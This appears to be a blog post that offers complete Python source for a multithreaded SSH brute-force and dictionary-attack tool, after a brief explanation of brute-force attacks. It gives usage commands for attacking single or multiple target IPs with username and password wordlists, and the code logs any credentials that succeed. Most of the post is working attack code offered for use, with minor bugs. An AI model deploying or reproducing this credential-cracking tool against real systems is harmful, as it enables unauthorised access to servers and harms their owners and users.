In cryptography, a brute-force attacks consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attackers systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attackers can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key searchs.
A brute-force attack is a cryptanalytic attack that can, in theory, be used to attempts to decrypt any encrypted data (except for data encrypted in an information-theoretically secure manners). Such an attack might be used when it is not possible to take advantage of other weaknesses in an encryption systems (if any exist) that would make the task easier.
When password guessing, this method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attacks are used because a brute-force search takes too long. Longer passwords, passphrases and keys have more possible values, making them exponentially more difficult to crack than shorter one.
Simple multi threaded SSHBrute Forcer, Standard Brute Forcing and Dictonary based attacks.
Note: The brute force methods is really bad just trys random strings with different lengths. Also it will attempt to create a lot of threads if you say 1000 attempt it will create 1000 thread.. Why you might ask because no one should really ever use this feature.
Usage:
Single Ip Dictonary Attacks:
python SSHBruteForce.py -i 127.0.0.1 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt
Single Ip Dictonary Attack Specifying thread and timeout:
python SSHBruteForce.py -i 127.0.0.1 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30
Multiple Ip Dictonary Attacks:
python SSHBruteForce.py -I ./targets.txt -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30
Single Ip BruteForce Attacks:
python SSHBruteForce.py -i 127.0.0.1 -p 22 -a 100 -l 8
Multiple Ip BruteForce Attacks:
python SSHBruteForce.py -I targets.txt -p 22 -a 100 -l 8
Example of target.txt:
127.0.0.1:22
127.0.0.2:23
Example of username.txt:
Siddhartha
Hari
Elsam
Example of password.txt:
love
god
sex
secret
Here is the Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | #Connection.py import sys from threading import Thread #Check For Paramiko Dependency try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print 'Missing Paramiko Dependency.' sys.exit(0) class Connection (Thread): ''' This is the class that checks if a specific Username and password combination was successful. ''' def __init__(self,username, password, targetIp, portNumber, timeoutTime): super(Connection, self).__init__() self.username = username self.password = password self.targetIp = targetIp self.portNumber = portNumber self.timeoutTime = timeoutTime self.status = "" def run(self): sshConnection = SSHClient() sshConnection.set_missing_host_key_policy(AutoAddPolicy()) try: sshConnection.connect(self.targetIp, port = int(self.portNumber), username = self.username,password = self.password, timeout = int(self.timeoutTime), allow_agent = False,look_for_keys = False) self.status = 'Succeeded' sshConnection.close() except: self.status = 'Failed' |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 | import sys import random from optparse import OptionParser import Util from Connection import Connection class SSHBruteForce(): def __init__(self): self.info = "Simple SSH Brute Forcer: By r4stl1n" self.targetIp = "" self.targetPort = 0 self.targets = [] self.usernames = [] self.passwords = [] self.connections = [] self.amountOfThreads = 0 self.currentThreadCount = 0 self.timeoutTime = 0 self.outputFileName = None self.singleMode = False self.verbose = False self.bruteForceLength = 0 self.bruteForceAttempts = 0 self.bruteForceMode = False self.characters = "abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" def startUp(self): usage = '%s [-i targetIp] [-U usernamesFile] [-P passwordsFile]' % sys.argv[0] optionParser = OptionParser(version = self.info, usage = usage) optionParser.add_option('-i', dest = 'targetIp', help = 'Ip to attack') optionParser.add_option('-p', dest = 'targetPort', help = 'Ip port to attack', default = 22) optionParser.add_option('-d', dest='typeOfAttack', help = 'Dictionary Attack', default = False) optionParser.add_option('-a', dest='attemptAmount', help = "Number of attempts before stopping", default = 2) optionParser.add_option('-l', dest='lengthLimit', help = 'Length of bruteforce strings', default = 8) optionParser.add_option('-I', dest = 'targetsFile', help = 'List of IP\'s and ports') optionParser.add_option('-C', dest = 'combolistFile', help = 'Combo List file') optionParser.add_option('-U', dest = 'usernamesFile', help = 'Username List file') optionParser.add_option('-P', dest = 'passwordsFile', help = 'Password List file') optionParser.add_option('-t', type = 'int', dest = 'threads', help = 'Amount of Threads', default = 10) optionParser.add_option('-T', type = 'int', dest = 'timeout', help = 'Timeout Time', default = 15) optionParser.add_option('-O', dest = "outputFile", help = 'Output File Name', default = None) optionParser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose') (options, args) = optionParser.parse_args() #First a check is used to see if there is at least a singleIp set or a targetList set if not options.targetIp and not options.targetsFile: optionParser.print_help() sys.exit(1) else: #Check to see if we are running a dictionary attack or a bruteforce if bool(options.typeOfAttack) == True: #Then another check to make sure the Username list and passwordlist are filled if (options.usernamesFile and options.passwordsFile) or options.combolistFile: #Then we check if it is a single ip only if options.targetIp and not options.targetsFile: self.singleMode = True self.singleTarget(options) elif not options.targetIp and options.targetsFile: self.multipleTargets(options) else: optionParser.print_help() sys.exit(1) else: optionParser.print_help() sys.exit(1) else: #setup the brtue force self.bruteForceMode = True #Then we check if it is a single ip only if options.targetIp and not options.targetsFile: self.singleMode = True self.singleTarget(options) elif not options.targetIp and options.targetsFilet: self.multipleTargets(options) else: optionParser.print_help() sys.exit(1) def singleTarget(self,options): self.targetIp = options.targetIp self.targetPort = options.targetPort self.amountOfThreads = options.threads self.timeoutTime = options.timeout self.outputFileName = options.outputFile self.verbose = options.verbose self.bruteForceLength = options.lengthLimit self.bruteForceAttempts = options.attemptAmount if bool(options.typeOfAttack): if options.combolistFile: self.usernames, self.passwords = self.__seperateDataFromComboList(options.combolistFile) else: self.usernames = Util.fileContentsToList(options.usernamesFile) self.passwords = Util.fileContentsToList(options.passwordsFile) self.showStartInfo() self.dictionaryAttackSingle() else: self.showStartInfo() self.bruteForceSingle() def multipleTargets(self,options): self.targets = Util.fileContentsToTuple(options.targetsFile) self.amountOfThreads = options.threads self.timeoutTime = options.timeout self.outputFileName = options.outputFile self.verbose = options.verbose self.bruteForceLength = options.lengthLimit self.bruteForceAttempts = options.attemptAmount if bool(options.typeOfAttack): if options.combolistFile: self.usernames, self.passwords = self.__seperateDataFromComboList(options.combolistFile) else: self.usernames = Util.fileContentsToList(options.usernamesFile) self.passwords = Util.fileContentsToList(options.passwordsFile) self.showStartInfo() self.dictionaryAttackMultiple() else: self.showStartInfo() self.bruteForceMultiple() @staticmethod def __seperateDataFromComboList(comboListFile): usernames = [] passwords = [] for t in Util.fileContentsToTuple(comboListFile): usernames.append(t[0]) passwords.append(t[1]) return usernames, passwords def showStartInfo(self): print "[*] %s " % self.info if self.singleMode: print "[*] Brute Forcing %s " % self.targetIp else: print "[*] Loaded %s Targets " % str(len(self.targets)) if self.bruteForceMode == False: print "[*] Loaded %s Usernames " % str(len(self.usernames)) print "[*] Loaded %s Passwords " % str(len(self.passwords)) print "[*] Brute Force Starting " if self.outputFileName is not None: Util.appendLineToFile("%s " % self.info, self.outputFileName) if self.singleMode: Util.appendLineToFile("Brute Forcing %s " % self.targetIp, self.outputFileName) else: Util.appendLineToFile("Loaded %s Targets " % str(len(self.targets)), self.outputFileName) Util.appendLineToFile("Loaded %s Usernames " % str(len(self.usernames)), self.outputFileName) Util.appendLineToFile("Loaded %s Passwords " % str(len(self.passwords)), self.outputFileName) Util.appendLineToFile("Brute Force Starting ", self.outputFileName) def dictionaryAttackSingle(self): for username in self.usernames: for password in self.passwords: self.createConnection(username, password, self.targetIp, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def dictionaryAttackMultiple(self): for target in self.targets: for username in self.usernames: for password in self.passwords: self.createConnection(username, password, target[0], int(target[1]), self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def bruteForceSingle(self): for x in range(int(self.bruteForceAttempts)): randomUserString = "" randomPasswordString = "" randomStringLength = random.randint(4,int(self.bruteForceLength)) for y in range(randomStringLength): randomUserString = randomUserString+random.choice(self.characters) randomStringLength = random.randint(4,int(self.bruteForceLength)) for z in range(randomStringLength): randomPasswordString = randomPasswordString + random.choice(self.characters) self.createConnection(randomUserString, randomPasswordString, self.targetIp, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def bruteForceMultiple(self): for target in self.targets: for x in range(self.bruteForceAttempts): randomUserString = "" randomPasswordString = "" randomStringLength = random.randint(4,self.bruteForceLength) for y in range(randomStringLength): randomUserString = randomUserString+random.choice(self.characters) randomStringLength = random.randint(4,self.bruteForceLength) for z in range(randomStringLength): randomPasswordString = randomPasswordString + random.choice(self.characters) self.createConnection(randomUserString, randomPasswordString, target, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def createConnection(self, username, password, targetIp, targetPort, timeoutTime): connection = Connection(username, password, targetIp, targetPort, timeoutTime) connection.start() self.connections.append(connection) self.currentThreadCount += 1 if self.verbose: print "[*] Adding Target: {0}, Testing with username: {1}, testing with password: {2}" .format(targetIp, username, password) def currentThreadResults(self): for connection in self.connections: connection.join() if connection.status == 'Succeeded': print "[#] TargetIp: %s " % connection.targetIp print "[#] Username: %s " % connection.username print "[#] Password: %s " % connection.password if self.outputFileName is not None: Util.appendLineToFile("TargetIp: %s " % connection.targetIp, self.outputFileName) Util.appendLineToFile("Username: %s " % connection.username, self.outputFileName) Util.appendLineToFile("Password: %s " % connection.password, self.outputFileName) if self.singleMode: self.completed() else: pass self.clearOldThreads() def clearOldThreads(self): self.connections = [] self.threadCount = 0 def completed(self): print "[*] Completed Brute Force." sys.exit(0) if __name__ == '__main__': sshBruteForce = SSHBruteForce() sshBruteForce.startUp() print "[*] Brute Force Completed" |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | def fileContentsToList(fileName): lineList = [] try: fileParser = open(fileName, 'r') except IOError: print "[!] Could not open file %s " % fileName except: print "[!] Could not access file %s" % fileName for line in fileParser.readlines(): newLine = line.replace('\n', '') lineList.append(newLine) return lineList def fileContentsToTuple(fileName): tupleList = [] try: fileParser = open(fileName, 'r') except IOError: print "[!] Could not open file %s " % fileName except: print "[!] Could not access file %s" % fileName for line in fileParser.readlines(): newLine = line.replace('\n', '') newTuple = (newLine[:line.find(':')],newLine[line.find(':')+1:]) tupleList.append(newTuple) return tupleList def appendLineToFile(line,filename): fileHandler = open(filename,"a+") fileHandler.write(line + "\n") fileHandler.close() |
Take your time to comment on this article.
Python brute force attack,
How to make brute force with python,
SSH brute-force,
SSH brute force GitHub,
Python SSH brute force,
Brute force algorithm Python,
Python FTP brute force script,
Create port scanner python,